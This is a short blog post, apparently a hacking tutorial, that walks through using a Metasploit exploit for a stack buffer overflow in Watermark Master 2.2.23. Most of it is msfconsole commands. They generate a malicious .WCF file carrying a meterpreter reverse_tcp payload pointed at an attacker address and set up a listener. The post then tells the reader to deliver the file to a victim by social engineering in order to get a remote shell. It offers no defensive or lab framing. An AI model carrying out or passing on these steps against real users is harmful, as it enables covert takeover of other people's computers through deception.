Hack Remote PC using Watermark Master Buffer Overflow (SEH)

This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when processing a specially crafted .WCF file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Watermark Master to open a malicious .WCF file.

Exploit Targets
Watermark Master 2.2.23

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/watermark_master
msf exploit (watermark_master)>set payload windows/meterpreter/reverse_tcp
msf exploit (watermark_master)>set lhost 192.168.0.110 (IP of Local Host)
msf exploit (watermark_master)>exploit


After we successfully generate the malicious wcf File, it will stored on your local computer

/root/.msf4/local/msf.wcf


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.110
exploit

Now send your msf.wcf files to victim using any social engineering technique. Now when the victim will use Watermark master you will get the meterpreter of victim PC.


0 comments:

Post a Comment